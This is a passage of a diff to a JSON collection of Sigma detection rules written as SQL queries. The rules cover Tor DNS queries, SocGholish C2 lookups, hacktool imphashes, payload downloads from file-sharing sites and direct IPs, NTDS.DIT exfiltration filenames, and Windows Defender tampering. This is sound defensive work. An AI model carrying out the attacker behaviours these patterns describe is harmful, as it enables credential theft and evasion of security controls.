'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 
'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + "description": "Detects the restoration of files from the defender quarantine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", - "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "title": "Windows Defender Threat 
Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_defender_threat.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", - "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', 
'4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 
'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash 
LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron 
Systems), Florian Roth (Nextron Systems)", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_defender_exploit_guard_tamper.yml" }, { - "title": "Exports Registry Key To an 
Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", - "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might try to disable defender features during testing (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", - "status": "experimental", - 
"description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator activity (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' 
ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "status": "experimental", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1137" + "attack.t1197" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE 
'\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE 